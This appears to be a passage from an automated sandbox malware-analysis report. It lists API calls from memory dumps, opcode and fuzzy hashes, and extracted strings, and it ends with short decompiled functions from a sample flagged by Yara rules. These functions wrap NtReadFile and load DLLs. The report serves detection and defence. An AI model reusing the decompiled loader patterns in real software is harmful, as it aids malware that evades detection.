                                                • LoadLibraryA.KERNELBASE(?), ref: 07BE96E2
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474812205.0000000007BE0000.00000040.00000001.sdmp, Offset: 07BE0000, based on PE: false
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01889951,00000800,00000000,00000000), ref: 01889B62
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.466986208.0000000001880000.00000040.00000001.sdmp, Offset: 01880000, based on PE: false
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0188B93F
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.466986208.0000000001880000.00000040.00000001.sdmp, Offset: 01880000, based on PE: false
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0188B93F
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.466986208.0000000001880000.00000040.00000001.sdmp, Offset: 01880000, based on PE: false
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01889951,00000800,00000000,00000000), ref: 01889B62
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.466986208.0000000001880000.00000040.00000001.sdmp, Offset: 01880000, based on PE: false
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474812205.0000000007BE0000.00000040.00000001.sdmp, Offset: 07BE0000, based on PE: false
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474812205.0000000007BE0000.00000040.00000001.sdmp, Offset: 07BE0000, based on PE: false
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 018898D6
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.466986208.0000000001880000.00000040.00000001.sdmp, Offset: 01880000, based on PE: false
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: cw
                                                • API String ID: 0-1686128743
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: 8^Uf
                                                • API String ID: 0-300179860
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: 8^Uf
                                                • API String ID: 0-300179860
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: 8^Uf
                                                • API String ID: 0-300179860
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: "
                                                • API String ID: 0-123907689
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: $
                                                • API String ID: 0-3993045852
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d4539c91e92ad3ad207152d064bfad7faca49b8623d62c2b137c49080d973d5b
                                                • Instruction ID: 93f0957f47d2e7deece0b6d0b3fdbc4e10161ec1d76163820a4deda8face2487
                                                • Opcode Fuzzy Hash: d4539c91e92ad3ad207152d064bfad7faca49b8623d62c2b137c49080d973d5b
                                                • Instruction Fuzzy Hash: BC518DB5A00316DFC704DF68C48489EBBF2FF89314B1589A9D4599B322DB30ED45CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 22e56d782ce7f7139ff865ac23295614cdccdd0a5d789c7803c869e9b59cecb9
                                                • Instruction ID: 1609e7be419b88d99c4cddea3c67309295173ba9b4e21beb85a201258e1ffa71
                                                • Opcode Fuzzy Hash: 22e56d782ce7f7139ff865ac23295614cdccdd0a5d789c7803c869e9b59cecb9
                                                • Instruction Fuzzy Hash: D441C0F460470A9FDB708B25C188B6277E1EF85318F46896DD4A383AA1E778EDC4C761
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bf3f4dcbef219aa189842730deda0cf879118f27cc53481346a311b75aaf1b56
                                                • Instruction ID: 1fb6c1e6d15a608d1243a9ac07b46e3da848118e7ee5b2851603ddc61fe5c0a6
                                                • Opcode Fuzzy Hash: bf3f4dcbef219aa189842730deda0cf879118f27cc53481346a311b75aaf1b56
                                                • Instruction Fuzzy Hash: A831096751E6D1CF8242E2657440CC12F6655A62E3304128BC46AEF55BE6388E4BCFF7
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 75c9e9cc9e9ca518d9c825441ac877b1fb5189fb694e95dad4bf28ec01e1e648
                                                • Instruction ID: 441dc14a01fa8dd2e4bff3b6466232360041e1f99a5a015d0cfc14a7d8115300
                                                • Opcode Fuzzy Hash: 75c9e9cc9e9ca518d9c825441ac877b1fb5189fb694e95dad4bf28ec01e1e648
                                                • Instruction Fuzzy Hash: 6F4105B43046018FC714CF29C488A2ABBF6FF89314B1585AAE55B8B776CB71EC41CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bce726a9909f48ef0fd5481beed98c7f10243e32d3069b64ed23757b35d1a3fd
                                                • Instruction ID: 1aab9083c49ec05bb8f2b9fae77c096b13c70f9438d6ef284a1f60d8b898ec73
                                                • Opcode Fuzzy Hash: bce726a9909f48ef0fd5481beed98c7f10243e32d3069b64ed23757b35d1a3fd
                                                • Instruction Fuzzy Hash: 7241CEB5B082168FCB18EF75D85866E7BF6BFC8201B044579D51ACB794EB349C02CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7ad00f849b7611f2f02280c34500f2a17018379e344753cfd44c67b20d621914
                                                • Instruction ID: a66b7ac10a915ba73c3b0744d918dbc92ef7fc7254bab6a4f6bb0521943b2f17
                                                • Opcode Fuzzy Hash: 7ad00f849b7611f2f02280c34500f2a17018379e344753cfd44c67b20d621914
                                                • Instruction Fuzzy Hash: 453191B1B0020A9BDB14DB69C850AAFB7F6AFC8214F148439D65ADB250EB70ED15CBD1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: acdd3926f2f9576ec1b51885d88aaba99a6771d94a7f0912c52fd257387532df
                                                • Instruction ID: a1d3a95755e797241966082a337810ce2666dd7be520dfd68b63c1b9ca489181
                                                • Opcode Fuzzy Hash: acdd3926f2f9576ec1b51885d88aaba99a6771d94a7f0912c52fd257387532df
                                                • Instruction Fuzzy Hash: 5A4108B4B00615CFCB08DF69C589A6ABBF6FF88705B1580A9E516CB361CB75ED40CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9b53fce172f3eb4a9027a9e1bea9b11645cfc192d915c3b22fa02f9853fa0e6f
                                                • Instruction ID: c44f9e8f4ac68dd1df529f29b502eda44edb11c5ccec0e29b8f9049f74f77318
                                                • Opcode Fuzzy Hash: 9b53fce172f3eb4a9027a9e1bea9b11645cfc192d915c3b22fa02f9853fa0e6f
                                                • Instruction Fuzzy Hash: 38315EB5B00216DFCB19DF64D8809EFB7B5FF88214B1404A6D826A7351D730ED41CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5c74edc68580cdea63fe1cf7592e6f13c2f86fddb01020b0cc13b2a39b14becc
                                                • Instruction ID: 6012c030fae9bd63b67086b805b72fa271cdf236186f7043462c6fee7d2864f4
                                                • Opcode Fuzzy Hash: 5c74edc68580cdea63fe1cf7592e6f13c2f86fddb01020b0cc13b2a39b14becc
                                                • Instruction Fuzzy Hash: 184107B9714505EFCB16CF59C4808A9BBB2EF89321716C496F9268B366CB30ED51CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 120ae2d1be07138a917d4f94ebf60d68b75f3840106db8260060b8edddb2fc73
                                                • Instruction ID: e5c0a0822e7a07ec447a1c7d62717ccdfdd1318158509372417157bdd2af2892
                                                • Opcode Fuzzy Hash: 120ae2d1be07138a917d4f94ebf60d68b75f3840106db8260060b8edddb2fc73
                                                • Instruction Fuzzy Hash: 6831BEB5B042158FCB48EF75D95896EBBB6FF88300B0445A9D45ACB7A1DA34AC01CFD1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dcb05ab21c36ef5bd905e7f809d231eecff58b397f747953a789eda192ebf007
                                                • Instruction ID: ea8e69c123f08d4be69f9c95ef6720591647b61cb204e0f358d7210ffd57804f
                                                • Opcode Fuzzy Hash: dcb05ab21c36ef5bd905e7f809d231eecff58b397f747953a789eda192ebf007
                                                • Instruction Fuzzy Hash: 8331B474B182648FC709ABB894640AE7FF6EF8A310B5500A7D15ADB395CE349C068BD2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 514d688031e4217252f04e81e365d2d95254870ea9ae1721a353434026901bbb
                                                • Instruction ID: 84138fdebce40fed9a580c4c72595e92dfe2d3d12d2adcb7f5d9f9c82c03b5be
                                                • Opcode Fuzzy Hash: 514d688031e4217252f04e81e365d2d95254870ea9ae1721a353434026901bbb
                                                • Instruction Fuzzy Hash: AA31B0B5B00616DFCB24CF68D944DAABBF2FF89310B1585AAE8599B715D730EC01CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f4031af222babbf68f983b4faab7690ed106a1d96f7e73ca9de404abce9c09d9
                                                • Instruction ID: 9ec200fe4f8ba0a152ba9ba9ff248ef1aa7a90393a1eb2ab6a6a3f0d33d76f92
                                                • Opcode Fuzzy Hash: f4031af222babbf68f983b4faab7690ed106a1d96f7e73ca9de404abce9c09d9
                                                • Instruction Fuzzy Hash: 933155B4B006118FCB08CF69C499A6ABBF5FF88715B1480A9E516CB362CB75E840CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c636126cac969e3fe9640e0386b42d5b79ec5682dc81392b9f31ce9e3ee6eff5
                                                • Instruction ID: bf9d718a9868b7e52ae8ee6a51fe6bd2aa66594f055facaee3af605f642a5d5f
                                                • Opcode Fuzzy Hash: c636126cac969e3fe9640e0386b42d5b79ec5682dc81392b9f31ce9e3ee6eff5
                                                • Instruction Fuzzy Hash: 613187B0E0424A8FDB05DF69D8145EEBBB1EF85305F04816AC536D73A1DB349906CF92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d760273e346572d331aead7e87cd603fd2b328cc64f3671576de48f18612faa2
                                                • Instruction ID: d23729f35e947fd0356b3d68d6bc0e5df9a6a5bd5f3d0cba61048e3b0509908a
                                                • Opcode Fuzzy Hash: d760273e346572d331aead7e87cd603fd2b328cc64f3671576de48f18612faa2
                                                • Instruction Fuzzy Hash: 602178B5B101118FC718DF2AD898D2A7BEAAFC9604B2580ADE506CB361DF70DC01CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b903c877be1837d02a730744575895b2007924818f008bdcf4ac17a5e5b69543
                                                • Instruction ID: b03492832db681cc77a216267a0495115d01e571e055a60ab4ea1d73cbf58243
                                                • Opcode Fuzzy Hash: b903c877be1837d02a730744575895b2007924818f008bdcf4ac17a5e5b69543
                                                • Instruction Fuzzy Hash: AD21B271704206DFCB20CF64D444AAAFBF6FF88315B00856AE4199B751DB31ED06CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000019.00000002.466761340.00000000017DD000.00000040.00000001.sdmp, Offset: 017DD000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 76f0fda9a4c16b8c83fc67d24cd6259bce17088edde23db73e11dcaf582d5eea
                                                • Instruction ID: dc5acb0847d2f1a3fa00ef39c99c45732039a29b8ea77fc58f689e8eb58d3e20
                                                • Opcode Fuzzy Hash: 76f0fda9a4c16b8c83fc67d24cd6259bce17088edde23db73e11dcaf582d5eea
                                                • Instruction Fuzzy Hash: 3C21F7B5500208DFDB25CF94D9C0B56FB75FB88324F2485A9DD090B286C336E856C6A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f0dcd4c8501fe2d7d0d251f1bd674818d229c9396bc10dc5f7e3bd9d9ef2e934
                                                • Instruction ID: b8c3b628233998d6caf99bf5612e36e8f4712fc29ef65a64a5c6fed1175e2141
                                                • Opcode Fuzzy Hash: f0dcd4c8501fe2d7d0d251f1bd674818d229c9396bc10dc5f7e3bd9d9ef2e934
                                                • Instruction Fuzzy Hash: 1A21B5B16053858FD7118B24C908BA9BFF1FF42214F0985A6D56ADB592D338AD05CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000019.00000002.466800757.00000000017ED000.00000040.00000001.sdmp, Offset: 017ED000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b1996ea4b1f90feb030f529a2e8174ab1883d72b5f0b492f23506b27b11d92da
                                                • Instruction ID: e716361ec907550af8a6e7b6d7486a633f3fc47dc0ae88cd0b7d061680f4e380
                                                • Opcode Fuzzy Hash: b1996ea4b1f90feb030f529a2e8174ab1883d72b5f0b492f23506b27b11d92da
                                                • Instruction Fuzzy Hash: F021F175604200DFDB25CF54D8C8B16FFE1FB8C254F28C9A9D9494B246C33AD847CA62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 720027bf4fa1255f07dcda91b3813aff104bf57c60477e22706094ba073bb4be
                                                • Instruction ID: 5aa5e075f15e443f16e095901dd33015409fe5213f48224024e0791a44ab1be2
                                                • Opcode Fuzzy Hash: 720027bf4fa1255f07dcda91b3813aff104bf57c60477e22706094ba073bb4be
                                                • Instruction Fuzzy Hash: 00216D712093808FC326DB35D8848167FB5EF8A218B1545AEE596CB253DB32DC46CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b51962902d6508f0c45fd098c81465ae53344cce83f4189206e430b53d7b4016
                                                • Instruction ID: 9154580aa8f75098bcab532401db4d169ed40415b8a0463e96879cd38adca46c
                                                • Opcode Fuzzy Hash: b51962902d6508f0c45fd098c81465ae53344cce83f4189206e430b53d7b4016
                                                • Instruction Fuzzy Hash: 42216DB1A0161ADFCB14CFA9C58496ABBF2FF8C310F1085A9D909AB721D730ED45CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2574f015b3adf256461e613745714ac35c83917904657ec02f3c93efb436c9c7
                                                • Instruction ID: d3eefa86efcaca08e00e84646abbe00552deb58fa2f592000e80ba6477e12c44
                                                • Opcode Fuzzy Hash: 2574f015b3adf256461e613745714ac35c83917904657ec02f3c93efb436c9c7
                                                • Instruction Fuzzy Hash: 151129F1714225AB8A14A779955892EF3D7EFC86107004A7DD62B8F744DF71EC0643D2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ef9a5593aeeb48e136ad25c1efdff88c3d2367830a831478800a6e5ef51a0662
                                                • Instruction ID: 7cfbfb28c120438bf534bac5e78763ecd0820329c580f5d1b92b53bfba8798ed
                                                • Opcode Fuzzy Hash: ef9a5593aeeb48e136ad25c1efdff88c3d2367830a831478800a6e5ef51a0662
                                                • Instruction Fuzzy Hash: B5113A325093C08FD702CB28D4949D97FB2EF162687154ADAC0998F263D739DD07C792
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 54f12219e183d83f82c5a3c33f06eba5a26d869e7cc70ca0e2af7f6a9bb18298
                                                • Instruction ID: ae6d6ed62676364b652cf85118b494161ef05601acd41e2e8fc647227a49abed
                                                • Opcode Fuzzy Hash: 54f12219e183d83f82c5a3c33f06eba5a26d869e7cc70ca0e2af7f6a9bb18298
                                                • Instruction Fuzzy Hash: 991125B57283528FCB1A5B74992403E3BF99FC620274400EBD41BCB292DE24DC01CBE2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:

                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3f3274118a5256d3b675bbf4d702804771f9e65e5fb24dfa569c7730cc130b56
                                                • Instruction ID: fe4e45dead4138fbdacb5e5b4ca3b72560e965b6283cfdfc9c3637c90c65cc1e
                                                • Opcode Fuzzy Hash: 3f3274118a5256d3b675bbf4d702804771f9e65e5fb24dfa569c7730cc130b56
                                                • Instruction Fuzzy Hash: 26B092257044004F8648E658CC52466F7A39BC9396BA8C4A99C0DCB355EE23DD038AC5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cdfec89ecf4d227c2e3f2741df1fca2c4e7a0756e2f1ba050c9a008d3bdc9887
                                                • Instruction ID: e80b9cbb32ce7aa80f269217a2acaa4f8c5de131eb2df65f765f3a476441bad2
                                                • Opcode Fuzzy Hash: cdfec89ecf4d227c2e3f2741df1fca2c4e7a0756e2f1ba050c9a008d3bdc9887
                                                • Instruction Fuzzy Hash: 3DB002747054005B8748D65DD951515A7D29BC9215728C4AD641DC7355DE22DD039644
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f5a59f213a8d2b0a54148dc3f29bdd04c0028f729aec327b196148e211c99ac2
                                                • Instruction ID: 777159729b0f65741a621ef6b22dbd7ec3ec27698709ee7f8408949270e0b186
                                                • Opcode Fuzzy Hash: f5a59f213a8d2b0a54148dc3f29bdd04c0028f729aec327b196148e211c99ac2
                                                • Instruction Fuzzy Hash: B6C092B0606240CFCB16CF20D1498547BB2AF8230936940DAE0098B622CB32DC82CB00
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6b5daf2f631a46200592fbe9dea7f2a48a8ab1f6405d9026bf25e8f92fc77d0c
                                                • Instruction ID: 639784decc0a6d57e755e56dd25889c7d9d445555367e24017d1e10d8a6c62c5
                                                • Opcode Fuzzy Hash: 6b5daf2f631a46200592fbe9dea7f2a48a8ab1f6405d9026bf25e8f92fc77d0c
                                                • Instruction Fuzzy Hash: 97A0027195D04CC78D548A50750E8347734E242696B0007D5FC1F89644AE365C32CFC2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.474221766.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: (Uf$(Uf$t%Qf$t%Qf
                                                • API String ID: 0-2797057296
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Executed Functions

                                                C-Code - Quality: 37%
                                                			E00419E10(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                				void* _t18;
                                                				void* _t27;
                                                				intOrPtr* _t28;
                                                
                                                				_t13 = _a4;
                                                				_t28 = _a4 + 0xc48;
                                                				E0041A960(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                				_t6 =  &_a32; // 0x414d42
                                                				_t12 =  &_a8; // 0x414d42
                                                				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                                				return _t18;
                                                			}







                                                APIs
                                                • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID: BMA$BMA
                                                • API String ID: 2738559852-2163208940
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0040ACD0(void* __eflags, void* _a4, intOrPtr _a8) {
                                                				char* _v8;
                                                				struct _EXCEPTION_RECORD _v12;
                                                				struct _OBJDIR_INFORMATION _v16;
                                                				char _v536;
                                                				void* _t15;
                                                				struct _OBJDIR_INFORMATION _t17;
                                                				struct _OBJDIR_INFORMATION _t18;
                                                				void* _t30;
                                                				void* _t31;
                                                				void* _t32;
                                                
                                                				_v8 =  &_v536;
                                                				_t15 = E0041C650( &_v12, 0x104, _a8);
                                                				_t31 = _t30 + 0xc;
                                                				if(_t15 != 0) {
                                                					_t17 = E0041CA70(__eflags, _v8);
                                                					_t32 = _t31 + 4;
                                                					__eflags = _t17;
                                                					if(_t17 != 0) {
                                                						E0041CCF0( &_v12, 0);
                                                						_t32 = _t32 + 8;
                                                					}
                                                					_t18 = E0041AEA0(_v8);
                                                					_v16 = _t18;
                                                					__eflags = _t18;
                                                					if(_t18 == 0) {
                                                						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                						return _v16;
                                                					}
                                                					return _t18;
                                                				} else {
                                                					return _t15;
                                                				}
                                                			}














                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
